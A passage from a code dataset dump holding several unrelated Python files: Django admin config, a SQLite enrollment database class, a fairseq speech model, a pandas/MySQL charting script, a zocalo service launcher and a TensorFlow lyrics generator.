DBK\n","sub_path":"Project/src/Modules/Computer/Web/web_thermostats.py","file_name":"web_thermostats.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"475352585","text":"from django.contrib import admin\nfrom django.contrib.flatpages.admin import FlatPageAdmin\nfrom django.contrib.flatpages.models import FlatPage\n\n# Register your models here.\nclass FlatPageAdmin(FlatPageAdmin):\n fieldsets = (\n (None, {'fields': ('url', 'title', 'content', 'sites')}),\n ('Advanced options', {\n 'classes': ('collapse', ),\n 'fields': (\n 'enable_comments',\n 'registration_required',\n 'template_name',\n ),\n }),\n )\n# register page\nadmin.site.unregister(FlatPage) \nadmin.site.register(FlatPage, FlatPageAdmin)","sub_path":"docs/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"53823774","text":"if __name__ == \"__main__\":\n import os\n import sys\n\n sys.path.append(os.getcwd())\n\nimport sqlite3\nimport os\nfrom sqlite3.dbapi2 import OperationalError\n\n\nclass DB:\n \"\"\"Interface class for executing queries to the database\"\"\"\n\n # Get the directory of the current file\n # Set the db path to current directory\n def __init__(self, database):\n self.curr_dir = os.path.dirname(__file__)\n self.db_path = os.path.join(self.curr_dir, database)\n\n def execute_script_from_file(self, filename):\n \"\"\"Executes commands from an sql file\n\n Args:\n filename (sql file): sql file to execute\n \"\"\"\n filename = os.path.join(self.curr_dir, filename)\n # Connect to db\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with open(filename, \"r\", encoding=\"utf-8\") as sql_file:\n sql_script = sql_file.read()\n\n # all SQL commands (split on ';')\n sql_commands = filter(None, sql_script.split(\";\"))\n # Execute every command from the input file\n for command in sql_commands:\n # This will skip and report errors\n # For example, if the tables do not yet exist, this will skip over\n # the DROP TABLE commands\n try:\n cursor.execute(command)\n except OperationalError as msg:\n print(\"Command skipped: \", msg)\n conn.commit()\n conn.close()\n\n def select_student(self, email):\n \"\"\"Queries db for student information\n\n Args:\n email (str): Email to search\n\n Returns:\n Tuple: Information of requested student\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\n \"SELECT * FROM students WHERE email=?\", (email,)\n ) # need the comma after email, to return the tuple, otherwise it will return a single index\n return cursor.fetchone()\n\n def select_instructor(self, email):\n \"\"\"Queries db for instructor information\n\n Args:\n email (str): Email to search\n\n Returns:\n Tuple: Information of requsted instructor\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\"SELECT * FROM instructors WHERE email=?\", (email,))\n return cursor.fetchone()\n\n def select_courses_count(self):\n \"\"\"Queries db for count of all courses\n\n Returns:\n Tuple: Integer count of courses\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\n \"SELECT COUNT (*) FROM courses\"\n ) # count to return the number of courses\n return cursor.fetchone()\n\n def select_course_subject_count(self, subject):\n \"\"\"Queries db for the count of 
courses of a subject\n\n Args:\n subject (str): Course abbreviation to search\n\n Returns:\n Tuple: Integer count of courses\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\"SELECT COUNT (*) FROM courses WHERE subject=?\", (subject,))\n return cursor.fetchone()\n\n def select_course_title_count(self, title):\n \"\"\"Queries db for the count of courses with a given title\n\n Args:\n title (str): Course title to search\n\n Returns:\n Tuple: Integer count of courses\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\n \"SELECT COUNT (*) FROM courses WHERE course_title=?\", (title,)\n )\n return cursor.fetchone()\n\n def select_course(self, subject, course_num):\n \"\"\"Queries db for course information\n\n Args:\n subject (str): The subject abbreviation to search\n course_num (int): The course number to search\n\n Returns:\n Tuple: Course information\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\n \"SELECT * FROM courses WHERE (subject=? AND course_num=?)\",\n (subject, course_num),\n )\n return cursor.fetchone()\n\n def select_all_sections(self, course_id):\n \"\"\"Queries db for all sections of a course\n\n Args:\n course_id (int): course id to search\n\n Returns:\n List: All section information\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\n \"\"\"SELECT * FROM course_sections \n WHERE course_id = ?\"\"\",\n (course_id,),\n )\n return cursor.fetchall()\n\n def select_course_enrollment(self, student_id):\n \"\"\"Queries db for course enrollment of a student, returns the id values\n for student, course, section, and the grade and term\n\n Args:\n student_id (int): Student id to search\n\n Returns:\n List: List of tuples containing course enrollment information\n\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\n \"\"\"SELECT * FROM course_enrollments WHERE student_id = ?\"\"\",\n (student_id,),\n )\n return cursor.fetchall()\n\n def select_student_enrollment_detailed(self, student_id):\n \"\"\"Queries db for detailed enrollment of a student.\n\n Args:\n student_id (int): Student id to search\n\n Returns:\n List: List of tuples containing course enrollment information\n\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\n \"\"\"SELECT \n c.course_id, c.subject, c.course_num, c.course_title,\n cs.course_section_id, cs.schedule_days, cs.start_time, cs.end_time,\n i.first_name || ' ' || i.last_name AS 'Instructor Name', c.course_units\n FROM courses c\n JOIN course_sections cs\n ON c.course_id = cs.course_id\n JOIN course_enrollments ce\n ON ce.course_section_id = cs.course_section_id AND ce.course_id = cs.course_id\n JOIN instructors i\n ON cs.instructor_id = i.instructor_id\n WHERE ce.student_id = ?\"\"\",\n (student_id,),\n )\n return cursor.fetchall()\n\n def select_student_enrollment_schedule(self, student_id):\n \"\"\"Queries db for a student's schedule\n\n\n Args:\n student_id (int): Student id to search\n\n Returns:\n List: List of tuples containing the days, start time and end time\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\n \"\"\"SELECT cs.schedule_days, cs.start_time, cs.end_time\n FROM course_enrollments ce\n JOIN course_sections cs\n ON cs.course_id = ce.course_id AND cs.course_section_id = 
ce.course_section_id\n WHERE ce.student_id = ?\n \"\"\",\n (student_id,),\n )\n return cursor.fetchall()\n\n def select_course_detail(self, course_id, course_section_id):\n \"\"\"Queries db for a detailed description of a course section. Provides subject,\n course number, title, section id, days, time, instructor name.\n\n Args:\n course_id (int): Course id to search\n course_section_id (int): Section id to search\n\n Returns:\n Tuple: Tuple containing the detailed information\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\n \"\"\"SELECT \n c.subject, c.course_num, c.course_title,\n cs.course_section_id, cs.schedule_days, cs.start_time, cs.end_time,\n i.first_name || ' ' || i.last_name AS 'Instructor Name', c.course_units\n FROM courses c\n JOIN course_sections cs\n ON c.course_id = cs.course_id\n JOIN instructors i\n ON cs.instructor_id = i.instructor_id\n WHERE c.course_id = ? AND cs.course_section_id = ?\"\"\",\n (course_id, course_section_id),\n )\n return cursor.fetchone()\n\n def select_course_enrollment_count(self, student_id):\n \"\"\"Queries the database for the number of courses a student is enrolled in\n\n Args:\n student_id (int): Student id to search\n\n Returns:\n Tuple: Tuple containing the count\n \"\"\"\n\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\n \"\"\"SELECT COUNT (*) FROM course_enrollments WHERE student_id = ?\"\"\",\n (student_id,),\n )\n return cursor.fetchone()\n\n def select_course_detail_by_subject(self, subject):\n \"\"\"Queries the database for detailed course information from the course subject\n\n Args:\n subject (str): Subject to search\n\n Returns:\n Tuple: Tuple containing the detailed course information\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\n \"\"\"SELECT \n c.course_id, c.subject, c.course_num, c.course_title,\n cs.course_section_id, cs.schedule_days, cs.start_time, cs.end_time,\n i.first_name || ' ' || i.last_name AS 'Instructor Name', c.course_units\n FROM courses c\n JOIN course_sections cs\n ON c.course_id = cs.course_id\n JOIN instructors i\n ON cs.instructor_id = i.instructor_id\n WHERE c.subject LIKE ?\n \"\"\",\n (subject,),\n )\n return cursor.fetchall()\n\n def select_course_detail_by_title(self, title):\n \"\"\"Queries the database for detailed course information from the course title\n\n Args:\n title (str): Title to search\n\n Returns:\n Tuple: Tuple containing the detailed course information\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\n \"\"\"SELECT \n c.course_id, c.subject, c.course_num, c.course_title,\n cs.course_section_id, cs.schedule_days, cs.start_time, cs.end_time,\n i.first_name || ' ' || i.last_name AS 'Instructor Name', c.course_units\n FROM courses c\n JOIN course_sections cs\n ON c.course_id = cs.course_id\n JOIN instructors i\n ON cs.instructor_id = i.instructor_id\n WHERE c.course_title LIKE ?;\n \"\"\",\n (title,),\n )\n return cursor.fetchall()\n\n def insert_course_enrollment(self, student_id, course_id, course_section_id):\n \"\"\"Inserts a new enrollment into the database\n\n Args:\n student_id (int): Id of student registering\n course_id (int): Id of course to be registered\n course_section_id (int): Id of course section to be registered\n\n Returns:\n int: 1 if INSERT succeeds, -1 if INSERT fails\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n try:\n with conn:\n                
cursor.execute(\n \"\"\"\n INSERT INTO course_enrollments ('student_id', 'course_id', 'course_section_id') VALUES\n (?,?,?)\"\"\",\n (student_id, course_id, course_section_id),\n )\n return 1\n except sqlite3.IntegrityError:\n return -1\n\n def select_section_schedule(self, course_id, course_section_id):\n \"\"\"Queries db for a section's schedule\n\n\n Args:\n course_id (int): Course id to search\n course_section_id (int): Course section id to search\n\n Returns:\n Tuple: Tuple containing the days, start time and end time\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\n \"\"\"SELECT cs.schedule_days, cs.start_time, cs.end_time\n FROM course_sections cs\n WHERE cs.course_id = ? AND cs.course_section_id = ?\n \"\"\",\n (course_id, course_section_id),\n )\n return cursor.fetchone()\n\n def update_course_enrollment(self, student_id, course_id, course_section_id, term):\n \"\"\"Updates an enrollment in the database\n\n Args:\n student_id (int): Id of student registering\n course_id (int): Id of course to be registered\n course_section_id (int): Id of course section to be registered\n term (str): Term of enrollment (currently unused in the UPDATE)\n\n Returns:\n int: 1 if UPDATE succeeds, -1 if UPDATE fails\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n try:\n with conn:\n cursor.execute(\n \"\"\"\n UPDATE course_enrollments\n SET course_id = ?, course_section_id = ?\n WHERE student_id = ?\"\"\",\n (course_id, course_section_id, student_id),\n )\n return 1\n except sqlite3.IntegrityError:\n return -1\n\n def delete_course_enrollment(self, student_id, course_id, course_section_id, term):\n \"\"\"Deletes an enrollment in the database\n\n Args:\n student_id (int): Id of student registering\n course_id (int): Id of course to be registered\n course_section_id (int): Id of course section to be registered\n term (str): Term of enrollment\n\n Returns:\n int: 1 if DELETE succeeds, -1 if DELETE fails\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n try:\n with conn:\n cursor.execute(\n \"\"\"\n DELETE FROM course_enrollments\n WHERE student_id = ? AND course_id = ? AND course_section_id = ? AND term = ?\"\"\",\n (student_id, course_id, course_section_id, term),\n )\n return 1\n except sqlite3.IntegrityError:\n return -1\n\n\nif __name__ == \"__main__\":\n db = DB(\"enrollmentsystem.db\")\n db.execute_script_from_file(\"enrollmentsystem.db.sql\")\n","sub_path":"data/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":15383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"164777040","text":"# Copyright (c) Facebook, Inc. 
and its affiliates.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\nimport copy\nimport math\nimport numpy as np\nfrom typing import Dict, List, Optional, Tuple\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch import Tensor\n\nfrom fairseq.models.fairseq_encoder import EncoderOut\nfrom fairseq import utils, checkpoint_utils, tasks\nfrom fairseq.models import (\n BaseFairseqModel,\n FairseqEncoder,\n FairseqEncoderDecoderModel,\n register_model,\n register_model_architecture,\n)\nfrom fairseq.modules import (\n LayerNorm,\n TransposeLast,\n Fp32LayerNorm,\n FairseqDropout,\n Fp32GroupNorm\n)\nfrom .wav2vec2_ctc import add_common_args, Wav2VecEncoder, Linear, base_architecture\n\nPAD_IDX = 1\nEOS_IDX = 2\neps = 1e-7\nTHRESHOLD = 0.999\n\n\ndef add_cif_args(parser):\n parser.add_argument(\"--lambda-qua\", type=float, metavar=\"D\", help=\"lambda-qua\")\n parser.add_argument(\"--lambda-alpha\", type=float, metavar=\"D\", help=\"lambda-alpha\")\n\n\n@register_model(\"wav2vec_cif_fc\")\nclass CIFFcModel(BaseFairseqModel):\n def __init__(self, args, encoder, decoder):\n super().__init__()\n self.args = args\n self.encoder = encoder\n self.decoder = decoder\n\n @staticmethod\n def add_args(parser):\n add_common_args(parser)\n add_cif_args(parser)\n\n @classmethod\n def build_model(cls, args, task):\n \"\"\"Build a new model instance.\"\"\"\n\n cif_architecture(args)\n\n if not hasattr(args, \"max_source_positions\"):\n args.max_source_positions = 2048\n if not hasattr(args, \"max_target_positions\"):\n args.max_target_positions = 2048\n\n tgt_dict = task.target_dictionary\n\n encoder = cls.build_encoder(args)\n decoder = cls.build_decoder(args, encoder.d, tgt_dict)\n\n return cls(args, encoder, decoder)\n\n @classmethod\n def build_encoder(cls, args):\n return Wav2VecEncoder(args)\n\n @classmethod\n def build_decoder(cls, args, input_dim, tgt_dict):\n return FCDecoder(args, input_dim, tgt_dict)\n\n def forward(self, **kwargs):\n encoder_output = self.encoder(tbc=False, **kwargs)\n alphas = self.get_alphas(encoder_output)\n if self.training:\n _alphas, num_output = self.resize(alphas, kwargs['target_lengths'])\n else:\n _alphas, num_output = self.resize(alphas)\n cif_outputs = self.cif(encoder_output, _alphas)\n\n if self.training and cif_outputs.abs().sum(-1).ne(0).sum() != kwargs['target_lengths'].sum():\n print('_alphas:\\t', _alphas.sum(-1))\n print('alphas:\\t', alphas.sum(-1))\n print('target:\\t', kwargs['target_lengths'])\n import pdb; pdb.set_trace()\n\n logits = self.decoder(cif_outputs)\n\n return {'logits': logits, 'len_logits': kwargs['target_lengths'],\n 'alphas': alphas, 'num_output': num_output}\n\n @staticmethod\n def get_alphas(encoder_output):\n padding_mask = encoder_output['padding_mask']\n\n if 'encoded' in encoder_output.keys():\n alphas = encoder_output['encoded'][:, :, -1]\n else:\n alphas = encoder_output['encoder_out'][:, :, -1]\n\n alphas = torch.sigmoid(alphas)\n alphas = alphas * (~padding_mask).float()\n\n return alphas\n\n def get_normalized_probs(self, net_output, log_probs):\n \"\"\"Get normalized probabilities (or log probs) from a net's output.\"\"\"\n\n logits = net_output[\"logits\"]\n if log_probs:\n res = utils.log_softmax(logits.float(), dim=-1)\n else:\n res = utils.softmax(logits.float(), dim=-1)\n\n res.batch_first = True\n\n return res\n\n @staticmethod\n def cif(encoder_output, alphas, threshold=THRESHOLD, log=False):\n if 
type(encoder_output) is Tensor:\n hidden = encoder_output\n elif 'encoded' in encoder_output.keys():\n hidden = encoder_output['encoded']\n else:\n hidden = encoder_output['encoder_out']\n\n device = hidden.device\n B, T, H = hidden.size()\n\n # loop varss\n integrate = torch.zeros([B], device=device)\n frame = torch.zeros([B, H], device=device)\n # intermediate vars along time\n list_fires = []\n list_frames = []\n\n for t in range(T):\n alpha = alphas[:, t]\n distribution_completion = torch.ones([B], device=device) - integrate\n\n integrate += alpha\n list_fires.append(integrate)\n\n fire_place = integrate >= threshold\n integrate = torch.where(fire_place,\n integrate - torch.ones([B], device=device),\n integrate)\n cur = torch.where(fire_place,\n distribution_completion,\n alpha)\n remainds = alpha - cur\n\n frame += cur[:, None] * hidden[:, t, :]\n list_frames.append(frame)\n frame = torch.where(fire_place[:, None].repeat(1, H),\n remainds[:, None] * hidden[:, t, :],\n frame)\n\n if log:\n print('t: {}\\t{:.3f} -> {:.3f}|{:.3f} fire: {}'.format(\n t, integrate[log], cur[log], remainds[log], fire_place[log]))\n\n fires = torch.stack(list_fires, 1)\n frames = torch.stack(list_frames, 1)\n list_ls = []\n len_labels = torch.round(alphas.sum(-1)).int()\n max_label_len = len_labels.max()\n for b in range(B):\n fire = fires[b, :]\n l = torch.index_select(frames[b, :, :], 0, torch.where(fire >= threshold)[0])\n pad_l = torch.zeros([max_label_len - l.size(0), H], device=device)\n list_ls.append(torch.cat([l, pad_l], 0))\n\n if log:\n print(b, l.size(0))\n\n if log:\n print('fire:\\n', fires[log])\n print('fire place:\\n', torch.where(fires[log] >= threshold))\n\n return torch.stack(list_ls, 0)\n\n @staticmethod\n def resize(alphas, target_lengths, noise=0.0, threshold=THRESHOLD):\n \"\"\"\n alpha in thresh=1.0 | (0.0, +0.21)\n target_lengths: if None, apply round and resize, else apply scaling\n \"\"\"\n device = alphas.device\n # sum\n _num = alphas.sum(-1)\n\n num = target_lengths.float()\n num = num + noise * torch.rand(alphas.size(0)).to(device)\n\n # scaling\n _alphas = alphas * (num / _num)[:, None].repeat(1, alphas.size(1))\n\n # rm attention value that exceeds threashold\n while len(torch.where(_alphas > threshold)[0]):\n print('fixing alpha')\n xs, ys = torch.where(_alphas > threshold)\n for x, y in zip(xs, ys):\n if _alphas[x][y] >= threshold:\n mask = _alphas[x].ne(0).float()\n mean = 0.5 * _alphas[x].sum() / mask.sum()\n _alphas[x] = _alphas[x] * 0.5 + mean * mask\n\n return _alphas, _num\n\n\nclass FCDecoder(FairseqEncoder):\n \"\"\"\n Transformer decoder consisting of *args.decoder_layers* layers. 
Each layer\n is a :class:`TransformerDecoderLayer`.\n\n Args:\n args (argparse.Namespace): parsed command-line arguments\n dictionary (~dataload.Dictionary): decoding dictionary\n embed_tokens (torch.nn.Embedding): output embedding\n no_encoder_attn (bool, optional): whether to attend to encoder outputs\n (default: False).\n \"\"\"\n\n def __init__(self, args, input_dim, dictionary):\n super().__init__(dictionary)\n self.proj = Linear(input_dim, len(dictionary), bias=True)\n\n def forward(self, encoded):\n \"\"\"\n Args:\n encoder_out (Tensor): output from the encoder, used for\n encoder-side attention\n Returns:\n tuple:\n - the decoder's output of shape `(batch, tgt_len, vocab)`\n \"\"\"\n x = self.proj(encoded)\n return x\n\n\n@register_model_architecture(\"wav2vec_cif_fc\", \"wav2vec_cif_fc\")\ndef cif_architecture(args):\n args.lambda_qua = getattr(args, \"lambda_qua\", 0.05)\n args.lambda_alpha = getattr(args, \"lambda_alpha\", 0.1)\n base_architecture(args)\n","sub_path":"wav2vec/wav2vec2_cif.py","file_name":"wav2vec2_cif.py","file_ext":"py","file_size_in_byte":8368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"135731852","text":"import pymysql\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom pandas.plotting import register_matplotlib_converters\nregister_matplotlib_converters() # suppress the warning when charts display dates\n# connect to the MySQL database, specifying the password (passwd) and database (db)\nconn = pymysql.connect(host = \"localhost\",user = 'root',passwd ='111',db = 'test',charset=\"utf8\")\nsql_query = 'SELECT * FROM test.user' # SQL query statement\ndata = pd.read_sql(sql_query, con=conn) # read the MySQL data\nconn.close() # close the database connection\ndata=data[['username','addtime']] # extract the specified columns\ndata.rename(columns = {'addtime':'注册日期','username':'用户数量'},inplace=True) # rename the columns ('注册日期' = registration date, '用户数量' = user count)\ndata['注册日期'] = pd.to_datetime(data['注册日期']) # convert the column to datetime\ndata = data.set_index('注册日期') # set the date as the index\ndata=data['2018-04-01':'2018-04-30'] # select data for the specified dates\n# count newly registered users per day\ndf=data.resample('D').size().to_period('D')\ndf.to_excel('result1.xlsx',index=False)# export the data to an Excel file\nx=pd.date_range(start='20180401', periods=30)\ny=df\n# draw a line chart\nsns.set_style('darkgrid')\nplt.rcParams['font.sans-serif']=['SimHei'] # use SimHei so the Chinese labels are not garbled\nplt.title('新用户注册时间分布图') # chart title (distribution of new user registrations over time)\nplt.xticks(fontproperties = 'Times New Roman', size = 8,rotation=20)# X-axis font size\nplt.plot(x,y)\nplt.xlabel('注册日期')\nplt.ylabel('用户数量')\nplt.show()","sub_path":"Python数据分析从入门到精通/MR/Code/11/data_new.py","file_name":"data_new.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"23680416","text":"#!/usr/bin/python\n# coding:utf-8\n# Test input\nname = input('please input your name: ')\nprint('hello,', name)\n\nx = float(input(\"Rectangle length: \"))\ny = float(input(\"Rectangle width: \"))\nprint(\"Rectangle area:\", x * y)\n# entering a string raises Error: NameError: name 'qwqe' is not defined\n# entering a number runs fine\n# cause: the project's Python version is wrong; correct the version under project interpreter\n# also, in Python 2 strings are read with raw_input() while input() accepts other types; Python 3 only has input(), which returns a string, so other types need explicit conversion\n","sub_path":"learnPython/输入输出/Test_Input.py","file_name":"Test_Input.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"340180498","text":"#\n# dlstbx.service\n# Starts a workflow service\n#\n\n# Note that the call semantics of dlstbx.service differs from other dlstbx\n# commands. dlstbx.service defaults to running in the testing ActiveMQ\n# namespace (zocdev), rather than the live namespace (zocalo). 
This is to\n# stop servers started by developers on their machines accidentally interfering\n# with live data processing.\n# To run a live server you must specify '--live'\n\n\nfrom __future__ import absolute_import, division, print_function\n\nimport logging\nimport os\nimport sys\n\nimport dlstbx.util\nimport workflows\nimport workflows.contrib.start_service\nimport workflows.logging\nfrom dlstbx import enable_graylog\nfrom dlstbx.util.colorstreamhandler import ColorStreamHandler\nfrom dlstbx.util.version import dlstbx_version\n\nimport workflows.services # To add the hack to the service; this should be done through setup.py instead, please see below\nfrom motioncorr2 import Motioncor2Runner\nfrom clear_motioncor2queue import Motioncor2RunnerClearQueue\n\nclass DLSTBXServiceStarter(workflows.contrib.start_service.ServiceStarter):\n __frontendref = None\n use_live_infrastructure = False\n\n def __init__(self):\n # initialize logging\n self.setup_logging()\n\n self.log.debug('Loading dlstbx workflows plugins')\n\n dlstbx = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n self.log.debug('Loading dlstbx credentials')\n\n # change settings when in live mode\n default_configuration = '/dls_sw/apps/zocalo/secrets/credentials-testing.cfg'\n if '--live' in sys.argv:\n self.use_live_infrastructure = True\n default_configuration = '/dls_sw/apps/zocalo/secrets/credentials-live.cfg'\n\n # override default stomp host\n from workflows.transport.stomp_transport import StompTransport\n try:\n StompTransport.load_configuration_file(default_configuration)\n except workflows.Error as e:\n self.log.warning(e)\n\n def setup_logging(self):\n '''Initialize common logging framework. Everything is logged to the central\n graylog server. Depending on settings, messages of DEBUG or INFO and higher\n go to the console.'''\n logger = logging.getLogger()\n logger.setLevel(logging.WARN)\n\n # Enable logging to console\n self.console = ColorStreamHandler()\n self.console.setLevel(logging.INFO)\n logger.addHandler(self.console)\n\n # logging.getLogger('stomp.py').setLevel(logging.DEBUG)\n logging.getLogger('workflows').setLevel(logging.INFO)\n logging.getLogger('scipion').setLevel(logging.INFO)\n\n self.log = logging.getLogger('dlstbx.service')\n self.log.setLevel(logging.DEBUG)\n\n # Enable logging to graylog\n enable_graylog()\n\n def on_parser_preparation(self, parser):\n parser.add_option(\"-v\", \"--verbose\", dest=\"verbose\", action=\"store_true\",\n default=False, help=\"Show debug output\")\n parser.add_option(\"--tag\", dest=\"tag\", metavar=\"TAG\", default=None,\n help=\"Individual tag related to this service instance\")\n parser.add_option(\"-d\", \"--debug\", dest=\"debug\", action=\"store_true\",\n default=False, help=\"Set debug log level for workflows\")\n parser.add_option(\"-r\", \"--restart\", dest=\"service_restart\", action=\"store_true\",\n default=False, help=\"Restart service on failure\")\n parser.add_option(\"--test\", action=\"store_true\", dest=\"test\",\n help=\"Run in ActiveMQ testing namespace (zocdev, default)\")\n parser.add_option(\"--live\", action=\"store_true\", dest=\"test\",\n help=\"Run in ActiveMQ live namespace (zocalo)\")\n self.log.debug('Launching ' + str(sys.argv))\n\n def on_parsing(self, options, args):\n if options.verbose:\n self.console.setLevel(logging.DEBUG)\n logging.getLogger('dials').setLevel(logging.DEBUG)\n logging.getLogger('dlstbx').setLevel(logging.DEBUG)\n logging.getLogger('xia2').setLevel(logging.DEBUG)\n if options.debug:\n            
logging.getLogger('workflows').setLevel(logging.DEBUG)\n self.options = options\n\n def before_frontend_construction(self, kwargs):\n kwargs['verbose_service'] = True\n kwargs['environment'] = kwargs.get('environment', {})\n kwargs['environment']['live'] = self.use_live_infrastructure\n return kwargs\n\n def on_frontend_preparation(self, frontend):\n self.log.info('Attaching ActiveMQ logging to transport')\n\n def logging_call(record):\n if frontend._transport.is_connected():\n try:\n record = record.__dict__['records']\n except:\n record = record.__dict__\n frontend._transport.broadcast('transient.log', record)\n\n amq_handler = workflows.logging.CallbackHandler(logging_call)\n if not self.options.verbose:\n amq_handler.setLevel(logging.INFO)\n logging.getLogger().addHandler(amq_handler)\n\n if self.options.service_restart:\n frontend.restart_service = True\n\n extended_status = {}\n if self.options.tag:\n extended_status['tag'] = self.options.tag\n for env in ('SGE_CELL', 'JOB_ID'):\n if env in os.environ:\n extended_status['cluster_' + env] = os.environ[env]\n extended_status['dlstbx'] = dlstbx_version()\n\n original_status_function = frontend.get_status\n\n def extend_status_wrapper():\n status = original_status_function()\n status.update(extended_status)\n status['mem-uss'] = dlstbx.util.get_process_uss()\n return status\n\n frontend.get_status = extend_status_wrapper\n\n\n# Hack to include the Motioncor2Runner in known_services\nworkflows.services.get_known_services()\nworkflows.services.get_known_services.cache['Motioncor2Runner'] = Motioncor2Runner\nworkflows.services.get_known_services.cache['Motioncor2RunnerClearQueue'] = Motioncor2RunnerClearQueue\n\n\nif __name__ == '__main__':\n DLSTBXServiceStarter().run(program_name='dlstbx.service',\n version=dlstbx_version(),\n transport_command_channel='command')\n\n","sub_path":"start_services.py","file_name":"start_services.py","file_ext":"py","file_size_in_byte":6342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"278556368","text":"#\n# Copyright 2016 The BigDL Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n# Related url: https://github.com/tensorflow/examples/blob/master/courses/udacity_intro_to_tensorflow_for_deep_learning/l10c03_nlp_constructing_text_generation_model.ipynb\n# Generating some new lyrics from the trained model\n\nimport tensorflow as tf\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\n\n# Other imports for processing data\nimport string\nimport numpy as np\nimport pandas as pd\n\n# DATA PREPROCESSING\n# First to get the dataset of the Song Lyrics dataset on Kaggle by:\n# !wget --no-check-certificate \\\n# https://drive.google.com/uc?id=1LiJFZd41ofrWoBtW-pMYsfz1w8Ny0Bj8 \\\n# -O /tmp/songdata.csv\n\n# Then to generate a tokenizer with the songdata.csv\ndef tokenize_corpus(corpus, num_words=-1):\n # Fit a Tokenizer on the corpus\n if num_words > -1:\n tokenizer = 
Tokenizer(num_words=num_words)\n else:\n tokenizer = Tokenizer()\n tokenizer.fit_on_texts(corpus)\n return tokenizer\n\ndef create_lyrics_corpus(dataset, field):\n # Remove all other punctuation\n dataset[field] = dataset[field].str.replace('[{}]'.format(string.punctuation), '')\n # Make it lowercase\n dataset[field] = dataset[field].str.lower()\n # Make it one long string to split by line\n lyrics = dataset[field].str.cat()\n corpus = lyrics.split('\\n')\n # Remove any trailing whitespace\n for l in range(len(corpus)):\n corpus[l] = corpus[l].rstrip()\n # Remove any empty lines\n corpus = [l for l in corpus if l != '']\n\n return corpus\n\n# Read the dataset from csv\ndataset = pd.read_csv('/tmp/songdata.csv', dtype=str)\n# Create the corpus using the 'text' column containing lyrics\ncorpus = create_lyrics_corpus(dataset, 'text')\n# Tokenize the corpus\ntokenizer = tokenize_corpus(corpus)\n\n# Get the uniform input length (max_sequence_len) of the model\nmax_sequence_len=0\nfor line in corpus:\n token_list = tokenizer.texts_to_sequences([line])[0]\n max_sequence_len=max(max_sequence_len,len(token_list))\n\n# Load the saved model which was trained on the Song Lyrics dataset\nmodel=tf.keras.models.load_model(\"path/to/model\")\n\n# Generate new lyrics from some \"seed text\"\nseed_text = \"im feeling chills\" # seed text can be customized\nnext_words = 100 # this defines the length of the new lyrics\n\nfor _ in range(next_words):\n token_list = tokenizer.texts_to_sequences([seed_text])[0] # convert the seed text to a list of token ids\n token_list = pad_sequences([token_list], maxlen=max_sequence_len - 1, padding='pre') # pad the input to equal length\n predicted = np.argmax(model.predict(token_list), axis=-1) # get the predicted word index\n output_word = \"\"\n for word, index in tokenizer.word_index.items():\n if index == predicted:\n output_word = word\n break\n seed_text += \" \" + output_word # add the predicted word to the seed 